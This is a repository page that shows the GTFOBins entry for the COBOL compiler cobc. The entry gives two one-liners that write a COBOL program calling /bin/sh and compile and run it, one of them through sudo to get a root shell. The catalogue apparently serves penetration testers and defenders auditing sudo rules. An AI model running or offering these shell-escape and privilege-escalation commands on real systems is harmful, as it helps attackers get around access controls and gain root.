This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
4347f58f55e7cc1486e44a5560fd261137c01b53
GTFOBins.github.io
/
_gtfobins
/
cobc.md
bcoles
b94b01477c
Create cobc.md
2020-03-14 11:53:05 +01:00
319 B
Raw
Blame
History
functions
functions
shell
sudo
code
TF=$(mktemp -d) echo 'CALL "SYSTEM" USING "/bin/sh".' > $TF/x cobc -xFj --frelax-syntax-checks $TF/x
code
TF=$(mktemp -d) echo 'CALL "SYSTEM" USING "/bin/sh".' > $TF/x sudo cobc -xFj --frelax-syntax-checks $TF/x
Reference in New Issue
View Git Blame
Copy Permalink